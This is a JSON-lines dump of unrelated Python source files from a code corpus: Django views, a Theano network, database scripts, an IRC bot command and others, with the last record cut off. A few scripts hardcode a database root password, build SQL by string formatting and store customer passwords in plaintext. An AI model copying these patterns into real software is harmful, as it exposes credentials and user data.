\"Reply\"\n subject = \"Re: \" + Thread.objects.get(pk=pk).title\n context = {'action' : action, \n 'title' : title,\n 'subject': subject}\n return render(request, \"forum/post.html\", context)\n\ndef new_thread(request, pk):\n \"\"\"Start a new thread.\"\"\"\n p = request.POST\n if p[\"subject\"] and p[\"body\"]:\n forum = Forum.objects.get(pk=pk)\n thread_details = {'forum': forum, \n 'title': p[\"subject\"], \n 'creator': request.user}\n thread = Thread.objects.create(**thread_details)\n post_details = {'thread': thread, \n 'body': p[\"body\"], \n 'title': p[\"subject\"], \n 'creator': request.user}\n Post.objects.create(**post_details)\n forum_url = reverse(\"forum.views.forum\", args=[pk])\n return HttpResponseRedirect(forum_url)\n else:\n error_message = \"You didn't provide the required details\"\n context = {'error_message': error_message}\n return render(request, 'forum/post_error.html', context)\n\ndef reply(request, pk):\n \"\"\"Reply to a thread.\"\"\"\n p = request.POST\n if p[\"body\"]:\n thread = Thread.objects.get(pk=pk)\n post_details = {'thread': thread, \n 'body': p[\"body\"],\n 'title': p[\"subject\"], \n 'creator': request.user}\n post = Post.objects.create(**post_details)\n thread_url = reverse(\"forum.views.thread\", args=[pk]) \n return HttpResponseRedirect(thread_url + \"?page=last\")\n else:\n error_message = \"You didn't provide a reply body\"\n context = {'error_message': error_message}\n return render(request, 'forum/post_error.html', context)","sub_path":"part-four/forum_project/forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"324799678","text":"from __future__ import print_function\n\nimport argparse\nimport numpy as np\nimport glob\nimport os\nimport ipdb\n\ndef _command_line_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-o',\n '--output',\n type=str,\n default='outputs/sources')\n parser.add_argument(\n '-m',\n '--maps',\n type=str,\n required=True)\n\n return parser\n\nWALL_TYPE = np.int8\nWALL = 0\nEMPTY = 1\n\nclass Maze:\n def __init__(self, map_filepath):\n assert os.path.exists(map_filepath)\n with open(map_filepath, 'r') as fd:\n def _process_map_str(token):\n return WALL if token == '#' else EMPTY\n # Generate map for maze\n board = np.array([ [ _process_map_str(char) for char in line.strip('\\n') ] \\\n for line in fd.readlines() ], dtype=WALL_TYPE)\n\n self.board = board\n self.nrows = board.shape[0]\n self.ncolumns = board.shape[1]\n\n def __str__(self):\n return os.linesep.join(''.join('X' if self.is_wall(i, j) else ' '\n for j in range(self.ncolumns))\n for i in range(self.nrows))\n\n def __hash__(self):\n return hash(self.board.tostring())\n\n def __eq__(self, other):\n return np.array_equal(self.board, other.board)\n\n def set_borders(self):\n self.board[0, :] = self.board[-1, :] = WALL\n self.board[:, 0] = self.board[:, -1] = WALL\n\n def is_wall(self, x, y):\n assert self.in_maze(x, y)\n return self.board[x][y] == WALL\n\n def set_wall(self, x, y):\n assert self.in_maze(x, y)\n self.board[x][y] = WALL\n\n def remove_wall(self, x, y):\n assert self.in_maze(x, y)\n self.board[x][y] = EMPTY\n\n def in_maze(self, x, y):\n return 0 <= x < self.nrows and 0 <= y < self.ncolumns\n\n def write_to_file(self, filename):\n f = open(filename, 'w')\n f.write(str(self))\n f.close()\n\nif __name__ == '__main__':\n parser = _command_line_parser()\n FLAGS = parser.parse_args()\n\n print(FLAGS.maps)\n map_filepaths = glob.glob(os.path.join(FLAGS.maps, '*.txt'))\n mazes = set()\n for idx, map_filepath in enumerate(map_filepaths):\n print('Processing {}'.format(map_filepath))\n maze = Maze(map_filepath)\n maze_name = \"{}\".format(os.path.basename(map_filepath))\n\n maze.write_to_file(os.path.join(FLAGS.output, maze_name))\n","sub_path":"maze_from_gridworld.py","file_name":"maze_from_gridworld.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"635544645","text":"\"\"\"Views for managing suppliers.\"\"\"\n\nfrom django.shortcuts import get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.views.generic.base import RedirectView, TemplateView\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\n\nfrom inventory import models\n\nfrom .views import InventoryUserMixin\n\n\nclass Suppliers(InventoryUserMixin, TemplateView):\n \"\"\"View for the list of suppliers.\"\"\"\n\n template_name = \"inventory/suppliers.html\"\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add suppliers to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"active_suppliers\"] = models.Supplier.objects.filter(active=True)\n context[\"inactive_suppliers\"] = models.Supplier.objects.filter(active=False)\n return context\n\n\nclass Supplier(InventoryUserMixin, TemplateView):\n \"\"\"View for supplier details.\"\"\"\n\n template_name = \"inventory/supplier.html\"\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add supplier to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"supplier\"] = get_object_or_404(models.Supplier, id=self.kwargs[\"pk\"])\n context[\"contacts\"] = context[\"supplier\"].supplier_contacts.all()\n return context\n\n\nclass CreateSupplier(InventoryUserMixin, CreateView):\n \"\"\"View for creating suppliers.\"\"\"\n\n model = models.Supplier\n fields = [\"name\"]\n\n\nclass ToggleSupplierActive(InventoryUserMixin, RedirectView):\n \"\"\"View to toggle the activation status of a supplier.\"\"\"\n\n def get_redirect_url(self, *args, **kwargs):\n \"\"\"Toggle the active status of a supplier.\"\"\"\n supplier = get_object_or_404(models.Supplier, pk=kwargs[\"pk\"])\n supplier.active = not supplier.active\n supplier.save()\n return supplier.get_absolute_url()\n\n\nclass CreateSupplierContact(InventoryUserMixin, CreateView):\n \"\"\"View for creating supplier contacts.\"\"\"\n\n model = models.SupplierContact\n fields = [\"name\", \"phone\", \"email\", \"notes\"]\n\n def form_valid(self, form):\n \"\"\"Add the supplier to the contact object.\"\"\"\n self.object = form.save(commit=False)\n self.object.supplier = get_object_or_404(\n models.Supplier, pk=self.kwargs[\"supplier_pk\"]\n )\n self.object.save()\n return super().form_valid(form)\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add supplier to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"supplier\"] = get_object_or_404(\n models.Supplier, pk=self.kwargs[\"supplier_pk\"]\n )\n return context\n\n\nclass UpdateSupplierContact(InventoryUserMixin, UpdateView):\n \"\"\"View for updating supplier contacts.\"\"\"\n\n model = models.SupplierContact\n fields = [\"name\", \"phone\", \"email\", \"notes\"]\n\n def get_context_data(self, *args, **kwargs):\n \"\"\"Add supplier to the template context.\"\"\"\n context = super().get_context_data(*args, **kwargs)\n context[\"supplier\"] = context[\"form\"].instance.supplier\n return context\n\n\nclass DeleteSupplierContact(InventoryUserMixin, DeleteView):\n \"\"\"View for deleting supplier contacts.\"\"\"\n\n model = models.SupplierContact\n\n def get_success_url(self):\n \"\"\"Return the URL to redirect to after a successful deletion.\"\"\"\n instance = get_object_or_404(models.SupplierContact, id=self.kwargs[\"pk\"])\n return reverse_lazy(\"inventory:supplier\", args=[instance.supplier.id])\n","sub_path":"inventory/views/suppliers.py","file_name":"suppliers.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"340196316","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nimport subprocess\r\nimport datetime\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\n\r\nmongo_url = os.getenv('MONGOLAB_URI', 'mongodb://localhost:27017')\r\n\r\n# add status to mongo\r\nclient = MongoClient(mongo_url)\r\nif 'localhost' in mongo_url:\r\n db = client.scfd\r\nelse:\r\n # for Heroku\r\n db = client.get_default_database()\r\n \r\nrunstatus = {\"runname\": sys.argv[1],\r\n \"description\": sys.argv[1],\r\n \"status\": \"1\",\r\n \"date\": datetime.datetime.utcnow()}\r\n\r\nrunstatus_id = db.runstatus.insert(runstatus)\r\n \r\nrunstatus1 = db.runstatus.find_one({\"_id\": runstatus_id})\r\n\r\np = subprocess.Popen(['SU2_CFD', sys.argv[2]], cwd=\"run_\" + sys.argv[1]) \r\np.communicate()\r\n\r\nrunstatus1[\"status\"] = \"2\"\r\nrunstatus1[\"date\"] = datetime.datetime.utcnow()\r\n \r\ndb.runstatus.save(runstatus1)\r\n","sub_path":"spawn-cfd-proc.py","file_name":"spawn-cfd-proc.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269151325","text":"#!/usr/bin/pythonw\n# encoding:utf-8\n\nimport MySQLdb\n\ndb = MySQLdb.connect(\"master\", \"root\", \"zhangwei\", \"isee\")\n\ncursor = db.cursor()\nsql = \"select * from sys_user \\\n where id ='%s'\" % (\"0bde947230f64272bed1a370b7c9347d\")\ntry:\n cursor.execute(sql)\n result = cursor.fetchall()\n for row in result:\n fid = row[0]\n fname = row[1]\n fage = row[3]\n fmail = row[4]\n print(\"fid = %s , fname = %s , fage = %d ,fmail = %s\" \\\n % (fid, fname, fage, fmail))\nexcept:\n print(\"Error : unable to fetch data\")\n\ndb.close()\n","sub_path":"src/python/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"345573027","text":"#Program created by Sebastian Larsen\n#date = 17/05-2021\n\n\nimport IKEA_Gruppe1Connect as thisDatabase\nfrom beautifultable import BeautifulTable\nimport time\n\n#connect to database\nthisConn = thisDatabase.dbconnect()\n\n#This function creates a beautifultable from the data reterived from IKEA DATABASE\ndef prettyprint(result):\n\ttable = BeautifulTable()\n\ttable.column_header = [\"Costumer_ID\", \"Email\", \"Reg_date\", \"First_name\", \"Last_name\", \"Phone_number\", \"Password\", \"Country\", \"Default_shipping_Addr\"]\n\tfor row in result:\n\t\ttable.rows.append(row)\n\tprint(table)\n\nmycursor = thisConn.cursor()\nmycursor.execute(\"select * From Customer\")\nmyRecords = mycursor.fetchall()\n\n\n\n# -----------------------------------------------\n#Here the program ask user to add a new customer\n\ndef Create_new_user():\n\tEmail = input(\"Insert Email: \\n\")\n\tFirst_name = input(\"Insert First name: \\n\")\n\tLast_name = input(\"Insert Last name: \\n\")\n\tPhone_number = int(input(\"Insert Phone_number: \\n\"))\n\tCountry = input(\"Insert Country: \\n\")\n\tPassword = input(\"Insert password: \\n\")\n\n\t\n\t\n\tsql = \" INSERT INTO Customer(Email, First_name, Last_name, Phone_number, Country, Password) VALUES (%s,%s,%s,%s,%s,%s)\"\n\tval = (Email, First_name, Last_name, Phone_number, Country, Password)\n\n\tmycursor = thisConn.cursor()\n\tmycursor.execute(sql, val)\n\tthisConn.commit()\n\tprint(\"User succesfully created\")\n\n\n\n#-----------------------------------------------\n#Here the program show the latest added user created\n\ndef Latest_added(result):\n\tsql = \"\"\"\n\tSELECT \n *\n FROM\n Customer\n ORDER BY Customer_ID DESC\n LIMIT 1\n\t\"\"\"\n\n\tmycursor = thisConn.cursor()\n\tmycursor.execute(sql)\n\tmyRecords = mycursor.fetchall()\n\n\n\ttable = BeautifulTable()\t\t\t\t\n\ttable.columns.header = [\"Customer info\"] \n\ttable.rows.append(myRecords)\n\n\tprint(table)\n\t\n\n#--------------------------------------------------\n#Creating a variable called \"title\", that combined with the fuction below \"hello\" makes the program smooth\ntitle = \"\\t\\t\\tMENU\\t\\t\\t\"\n\ndef hello():\n print(\"\\033[H\\033[J\") \n print(title)\n print(\"\\n\")\n\n\ndef main_menu():\n\thello()\n\toptions = [\n\t\t\"Print Customer table from IKEA DATABASE\",\n\t\t\"Create new user\",\n\t\t\"show latest user created\",\n\t\t\"Exit Program\\n\"\n\t\t]\n\tprint(\"Enter a number to select an option:\\n\")\n\tfor d, options in enumerate(options):\n\t\tprint(\"[\" + str(d + 1) + \"] \" + options)\n\n\tchoice = int(input(\"Select an option [1] - [4]: \"))\n\n\n\tif choice in range(1,7):\n\t\tif choice == 1:\n\t\t\ttime.sleep(1)\n\t\t\tprettyprint(myRecords)\n\t\t\ttime.sleep(5)\n\t\t\tmain_menu()\n\t\t\t\n\n\t\telif choice == 2:\n\t\t\ttime.sleep(1)\n\t\t\tCreate_new_user()\n\t\t\ttime.sleep(4)\n\t\t\tmain_menu()\n\n\n\t\telif choice == 3:\n\t\t\ttime.sleep(1)\n\t\t\tLatest_added(myRecords)\n\t\t\ttime.sleep(5)\n\t\t\tmain_menu()\n\n\t\telif choice == 4:\n\t\t\thello()\n\t\t\tprint(\"\\n\")\n\t\t\tprint(\"Quitting.....\")\n\t\t\ttime.sleep(1.5)\n\t\t\texit()\n\telse:\n\t\tprint(\"I dont know this action..\")\n\t\ttime.sleep(2)\n\t\tmain_menu()\n\n#her bliver funktionen main_menu() initialiseret\nmain_menu()","sub_path":"IKEA_gruppe1Python.py","file_name":"IKEA_gruppe1Python.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"619269470","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUSING THEANO\nBuild a 3-layer neural network with 1 input layer, 1 hidden layer and 1 output layer. \n The number of nodes in the input layer is 2; the dimensionality of our data.\n The number of nodes in the output layer is 2; the number of classes we have.\n The number of nodes in the hidden layer will vary.\nCreated on Mon Dec 4 12:51:47 2017\n@author: Raul Vazquez\n\"\"\"\n#----------------------------------------------------------------\n# THIS PART IS THE SAME AS nn1.py:\n#----------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nimport scipy.optimize as op\n##########################\n##########################\nimport os\nos.chdir(\"C:\\\\Users\\\\Raul Vazquez\\\\Desktop\\\\reSkilling\\\\reSkilling\\\\nn_implementation\")\n############################\n############################\nimport utils_loc\n\n# Generate a dataset and plot it\nnp.random.seed(100)\nX_train, y_train = datasets.make_moons(200, noise=0.25)\nX_train = X_train.astype('float32')\nplt.scatter(X_train[:,0], X_train[:,1], s=40, c=y_train, cmap=plt.cm.Spectral)\n\n\nm = len(X_train) # training set size\nnn_input_dim = X_train.shape[1] # input layer dimensionality\nnn_output_dim = 2 # output layer dimensionality\n''' IMPORTANT PARAMETER: play with nn_hdim to see how the decision boundary changes'''\nnn_hdim = 4 # hidden layer dmensionality (3 seems to be the optimal, 4 already overfitts the data)\n# Gradient descent parameters\nepsilon = 0.01 # learning rate for gradient descent\nreg_lambda = 0.01 # regularization strength\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n\n\n\nimport theano\nimport theano.tensor as T\ntheano.config.floatX = 'float32'\n# Data vectors as tensors\nX = T.matrix('X', dtype='float32') # matrix of doubles\ny = T.ivector('y') # vector of int32\n''' We have not assigned any values to X or y.\n All we have done is defined mathematical expressions for them.\n If we want to evaluate an expression we can call its eval method.\n EXAMPLE 1:\n (X * 2).eval({X : [[1,1],[2,2]] })\n evaluates the expression X * 2 for the values in the array X: [[1,1],[2,2]]\n EXAMPLE 2:\n Create a Theano function\n Mat = T.matrix('Mat')\n x_squared = Mat ** 2\n X_call_xsquared = theano.function([Mat], x_squared)\n When called, evaluates the expression defined my x_squared for the values\n in the input given\n X_call_xsquared([[1,1],[2,2]])\n'''\n\n# Assign parameters W_1, b_1, W_2, b_2 as shared variables.\n# initialize bias uhnits to zero and the weights randomly to break the symmetry of the problem\nW1 = theano.shared(np.random.randn(nn_input_dim, nn_hdim), name='W1')\nb1 = theano.shared(np.zeros(nn_hdim), name='b1')\nW2 = theano.shared(np.random.randn(nn_hdim, nn_output_dim), name='W2')\nb2 = theano.shared(np.zeros(nn_output_dim), name='b2')\nW1.get_value() # shows the values of W1\n\n''' FORWARD propagation. Same code as in utils_loc.py \nBUT now we are difining expressions, not evaluating. ''' \na1 = X\nz2 = a1.dot(W1) + b1\na2 = T.tanh(z2)\nz3 = a2.dot(W2) + b2\na3 = T.nnet.softmax(z3) # recall a3 is the probs of each example to belong to each class\nexp_scores = T.exp(z3)\na3bis = exp_scores / T.sum(exp_scores, axis=1, keepdims=True)\n\n# The regularization term \nloss_reg = 1./m * reg_lambda/2 * (T.sum(T.sqr(W1)) + T.sum(T.sqr(W2))) \n# the loss function we want to optimize\ndata_loss = T.nnet.categorical_crossentropy(a3, y).mean() + loss_reg\n\n# Returns the predicted class for that example/input \nprediction = T.argmax(a3, axis=1)\n\n# Theano functions that can be called from our Python code\nfwd_prop = theano.function([X], a3)\nfwd_propBIS = theano.function([X], a3bis)\ncalculate_loss = theano.function([X, y], data_loss)\npredict = theano.function([X], prediction)\n\n# Example call: Forward Propagation\n# fwd_prop([[4,6]]), fwd_prop([[4,6],[2,3]]) # the argmuent must be of dims m*2 (just 2 cols, since X is like that)\n\n# Calculate the derivatives with Theano\ndW2 = T.grad(data_loss, W2)\ndb2 = T.grad(data_loss, b2)\ndW1 = T.grad(data_loss, W1)\ndb1 = T.grad(data_loss, b1)\n''' \nWe could here use BACK propagation with the expression definition (as we did for FWDprop):\n y_canonical = T.eye(2)[y]\n delta3 = a3 - y_canonical # recall delta3 = a3 - y, when y defd as a matrix with boolean canonical entries\n delta2 = delta3.dot(W2.T) * (1 - T.power(a2, 2))\n # derivatives\n dW2_noreg = (a2.T).dot(delta3)\n db2 = T.sum(delta3, axis=0, keepdims=True)\n dW1_noreg = np.dot(a1.T, delta2)\n db1 = T.sum(delta2, axis=0)\n # include regularization term\n dW2 = dW2_noreg + reg_lambda * W2\n dW1 = dW1_noreg + reg_lambda * W1\n'''\n\n# define a SIMPLE GRADIENT DESCENT in THEANO\ngradient_step = theano.function( [X, y],\n updates=((W2, W2 - epsilon * dW2),\n (W1, W1 - epsilon * dW1),\n (b2, b2 - epsilon * db2),\n (b1, b1 - epsilon * db1)))\n\n# Initialize the parameters to random values. We need to learn these.\n# (Needed in case we call this function multiple times)\nnp.random.seed(0)\nW1.set_value(np.random.randn(nn_input_dim, nn_hdim) / np.sqrt(nn_input_dim))\nb1.set_value(np.zeros(nn_hdim))\nW2.set_value(np.random.randn(nn_hdim, nn_output_dim) / np.sqrt(nn_hdim))\nb2.set_value(np.zeros(nn_output_dim))\n\ndef train_model(num_iters=20000, print_loss=False):\n '''\n This function learns parameters for the neural network and returns the model.\n INPUT: \n - num_passes: Number of passes through the training data for gradient descent\n - print_loss: If True, print the loss every 1000 iterations\n '''\n # Gradient descent. For each batch...\n for i in range(0, num_iters):\n # This will update our parameters W2, b2, W1 and b1!\n gradient_step(X_train, y_train)\n \n # Optionally print the loss.\n # This is expensive because it uses the whole dataset, so we don't want to do it too often.\n if print_loss and i % 1000 == 0:\n print (\"Loss after iteration %i: %f\" %(i, calculate_loss(X_train, y_train)) )\n\n\n# Build a model with a 3-dimensional hidden layer\ntrain_model(10000, print_loss=True)\n\n# Plot the decision boundary\nutils_loc.plot_decision_boundary(lambda x: \n utils_loc.predict(W1.get_value(), b1.get_value(), W2.get_value(), b2.get_value(), x),X_train,y_train)\nplt.title(\"Decision Boundary for hidden layer size \"+ str( nn_hdim))\n\n\n\n\n##############################################################################\n######################### USE SCIPY TO TRAIN THE MODEL #######################\n##############################################################################\n'''\nAs in nn1.py one can use the minimization routines implemented in scipy.optimize\nI decided to do it as follows\n'''\ntheano.config.floatX = 'float32'\n\n# make random initialization of the params \nW1.set_value(np.random.randn(nn_input_dim, nn_hdim) / np.sqrt(nn_input_dim))\ncardW1 = nn_input_dim*nn_hdim\nb1.set_value(np.zeros(nn_hdim))\nW2.set_value(np.random.randn(nn_hdim, nn_output_dim) / np.sqrt(nn_hdim))\nb2.set_value(np.ones(nn_output_dim))\ninitial_grad = np.append(np.append(b1.get_value(), (W1.get_value()).ravel()), np.append(b2.get_value(), (W2.get_value()).ravel() ) )\n\n# define a theano function to evaluate the gradient at the given values. \neval_gradient = theano.function([X,y], (db1, dW1, db2, dW2),\n updates = ((W2, W2 - epsilon * dW2),\n (W1, W1 - epsilon * dW1),\n (b2, b2 - epsilon * db2),\n (b1, b1 - epsilon * db1)))\n\ndef caller(x):\n loss = calculate_loss(X_train,y_train)\n grads = eval_gradient(X_train, y_train)\n grad= np.append(np.append(grads[0], grads[1].ravel()), np.append(grads[2], grads[3].ravel() ) ) \n return (np.float(loss), grad)\n\n\nresult = op.minimize(fun = caller, x0 = initial_grad, jac = True)\n\nnew_b1 = result.x[0:nn_hdim]\nnew_W1 = np.reshape( result.x[nn_hdim:(nn_hdim + cardW1)], (nn_input_dim, nn_hdim) )\nnew_b2 = result.x[(nn_hdim + cardW1):(nn_hdim + cardW1 + nn_output_dim)]\nnew_W2 = np.reshape( result.x[(nn_hdim + cardW1 + nn_output_dim):], (nn_hdim, nn_output_dim) )\n \n\nutils_loc.plot_decision_boundary( (lambda x: utils_loc.predict(W1.get_value(), b1.get_value(), W2.get_value(), b2.get_value(), x)), X_train, y_train )\nplt.title(\"Decision Boundary of initial Parameters\")\n \nutils_loc.plot_decision_boundary( (lambda x: utils_loc.predict(new_W1, new_b1, new_W2, new_b2, x) ), X_train,y_train)\nplt.title(\"Decision Boundary for hidden layer size \"+ str( nn_hdim))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"nn_implementation/nn1_theano.py","file_name":"nn1_theano.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"448509820","text":"import datetime\n\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom django.urls import reverse\n\nfrom .models import Question\n\n\ndef create_question(question_text, days):\n \"\"\" Create a questions with days offset (+ve for future, -ve for past) \"\"\"\n time = timezone.now() + datetime.timedelta(days=days)\n return Question.objects.create(question_text=question_text, pub_date=time)\n\n\nclass QuestionModelTest(TestCase):\n def test_was_published_recently_with_future_qs(self):\n \"\"\" was_published_recently() returns False for future dates \"\"\"\n time = timezone.now() + datetime.timedelta(days=30)\n future_question = Question(pub_date=time)\n self.assertIs(future_question.was_published_recently(), False)\n\n def test_was_published_recently_with_old_qs(self):\n \"\"\" was_published_recently() returns False for qs older than 1 day \"\"\"\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_question = Question(pub_date=time)\n self.assertIs(old_question.was_published_recently(), False)\n\n def test_was_published_recently_with_recent_qs(self):\n \"\"\" was_published_recently() returns True for qs created within a day \"\"\"\n time = timezone.now() - timezone.timedelta(hours=23, minutes=59, seconds=1)\n recent_question = Question(pub_date=time)\n self.assertIs(recent_question.was_published_recently(), True)\n\n\nclass QuestionIndexViewTest(TestCase):\n def test_no_questions(self):\n response = self.client.get(reverse('polls:index'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"No polls are available\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n def test_past_question(self):\n create_question(\"Past\", days=-20)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(response.context['latest_question_list'],\n [''])\n\n def test_future_question(self):\n create_question(question_text=\"Future\", days=20)\n response = self.client.get(reverse('polls:index'))\n self.assertContains(response, \"No polls are available.\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n","sub_path":"polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479670006","text":"from PySide.QtGui import *\nfrom PySide.QtCore import *\n\ndef main():\n import sys\n\n app = QApplication(sys.argv)\n\n window = QMainWindow()\n\n # メニューの追加\n # メニューバーを取得する\n menubar = window.menuBar()\n\n # File メニューを追加する\n filemenu = menubar.addMenu(\"&File\")\n\n # File メニューに、Exit メニュー項目を追加する\n\n exit_action = filemenu.addAction(\"&Exit\")\n exit_action.triggered.connect(app.quit)\n\n window.show()\n\n # メイン イベントループを開始する\n app.exec_()\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"source/sample/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447967092","text":"# agency.py\n\nimport random\n\n# Metadata\n\nNAME = 'agency'\nENABLE = True\nTYPE = 'command'\nPATTERN = '^!(?Pcia|fbi|fiveeyes|kgb|eu|gnu|gnome)$'\nUSAGE = '''Usage: !agency\n Will report activity to desired agency\n'''\n\n# reasons\nreasons = {\n \"cia\":[\n \"This incident has been reported (Case #\",\n \"This regime will be overthrown (Useless War #\"\n ],\n \"fbi\":[\n \"This collusion with Russia has been filed and will be used against you at a politcally opportune moment (Case #\"\n ],\n \"fiveeyes\":[\n \"This communication has been intercepted and will be shared among members of the Five Eyes (Case #\"\n ],\n \"kgb\":[\n \"The Party has been notified of your bourgeois thought. (Gulag Inmate #\"\n ],\n \"eu\":[\n \"Your attempt at executing a mutually beneficial trade has been been brought before the European Commission. (Anti-Trust Case #\",\n \"Your speech has been regulated. (EU Law #\"\n ],\n \"gnu\":[\n \"Your use of proprietary software has been reported to the FSF. (Assigned GNULAG #\"\n ],\n \"gnome\":[\n \"Your disgust over KDE has been noted. (Cult Follower #\",\n \"You are now subscribed to GNOME Facts! (Cult Follower #\"\n ]\n }\n\n# Command\n\ndef command(bot, nick, message, channel, agency=None):\n report = ''.join([\"%s\" % random.randint(0, 9) for num in range(0, 5)])\n response = random.choice(reasons[agency]) + report + \")\"\n\n bot.send_response(response, nick, channel)\n\n# Register\n\ndef register(bot):\n return (\n (PATTERN, command),\n )\n\n# vim: set sts=4 sw=4 ts=8 expandtab ft=python:\n","sub_path":"modules/agency.py","file_name":"agency.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"482928522","text":"from heapq import heappush,heappop\nimport sys\n\nINF = int(1e9)\ngraph =[[]]\na =[]\ndef update_road(n,s_node,e_node,roads,trap,n_node): \n global graph\n global a\n update_n_node = n_node\n print(\"udate_n_node:\",n_node)\n if trap==True:\n print(\"***********\")\n for road in roads:\n #print(\"roads:\",roads)\n print(\"road[0]:\",road[0])\n print(\"road[1]:\",road[1])\n\n if road[0] == update_n_node or road[1] == update_n_node:\n print(\"update_n_node:\", update_n_node)\n a.append(road[0])\n a.append(road[1])\n road[0] = a[1]\n road[1] = a[0]\n a=[]\n print(\"road:\",road)\n graph = [[]for i in range(n+1)]\n \n for road in roads:\n s_node, e_node, cost = road[0], road[1], road[2]\n graph[s_node].append([e_node,cost])\n\n print(graph)\ndef preprocess(n, roads):\n global graph\n #각 노드에 연결되어있는 노드에 대한 정보를 담는 리스트\n graph = [[]for i in range(n+1)]\n \n for road in roads:\n s_node, e_node, cost = road[0], road[1], road[2]\n graph[s_node].append([e_node,cost])\n\n print(graph)\n\ndef dijkstra(n,s_node,e_node,roads,traps):\n global graph\n table = [INF for i in range(n+1)]\n table[s_node] = 0\n print(table)\n pq = [[0,s_node]]\n\n while pq:\n dist, now = heappop(pq)\n\n \n for item in graph[now]:\n trap = False\n print(\"graph[now] :\",graph[now])\n n_node, cost = item[0], item[1]\n print(\"n_node:\", n_node)\n cost +=dist\n print(\"cost:\", cost)\n \n if n_node in traps:\n trap = True\n update_road(n,s_node,e_node,roads,trap,n_node)\n if cost< int(1e9):\n if n_node != s_node: \n table[n_node] = cost\n heappush(pq,[cost,n_node])\n print(\"pq: \",pq)\n print(table)\n return table[e_node]\nn,start,end = 4,1,4\nroads = [[1, 2, 1], [3, 2, 1],[2,4,1]]\ntraps = [2,3]\nprint(preprocess(n,roads))\nprint(dijkstra(n,start,end,roads,traps))\n\n","sub_path":"kako4.py","file_name":"kako4.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536145175","text":"from flask import Flask, g\nimport pymysql\n\nfrom api_blueprint import api_bp\n\napp = Flask('CBS_API')\n\napp.config.from_object('config')\n\napp.register_blueprint(api_bp)\n\n\n@app.before_request\ndef before_request():\n g.db = pymysql.connect(**app.config['DATABASE'],\n cursorclass=pymysql.cursors.DictCursor)\n\n\n@app.after_request\ndef after_request(response):\n g.db.close()\n return response\n\n\nif __name__ == '__main__':\n app.run(**app.config['FLASK'])\n","sub_path":"cbsapi/cbsapi.py","file_name":"cbsapi.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"580155816","text":"import sys\n\ntext_list = []\nresult = ''\n\nfor _ in range(5):\n text_list.append(sys.stdin.readline().strip())\n\n# 리스트 중 가장 긴 길이\nfor i in range(max(len(t) for t in text_list)):\n for text in text_list:\n result += text[i] if len(text) > i else ''\n\nsys.stdout.writelines(result)\n","sub_path":"backjoon/기타/10798_세로읽기.py","file_name":"10798_세로읽기.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492241966","text":"import requests\nfrom requests.auth import HTTPBasicAuth\n\nfrom sqlalchemy.orm import sessionmaker\nfrom data_updater.models import server as server_models\n\nfrom datetime import datetime\nfrom time import mktime\n\nfrom .cache import update_cache\nfrom config import CLIENT_SETTINGS\n\nfrom .utils import request_data, updated_request, timestamp_cur, str_to_datetime\n\nurl = CLIENT_SETTINGS['root_url'].rstrip('/') + '/' + CLIENT_SETTINGS['submission_url'].lstrip('/')\nusername = CLIENT_SETTINGS['username']\npassword = CLIENT_SETTINGS['password']\nauth = HTTPBasicAuth(username, password)\ncache_name = 'submission_updater_cache'\n\n\nSession = sessionmaker(bind=server_models.engine)\nsession = Session()\n\n\n# 废弃代码\ndef request_submit(submission_json):\n request_url = '%s/' % (url.rstrip('/'),)\n r = requests.post(url, submission_json, auth=auth)\n if r.status_code 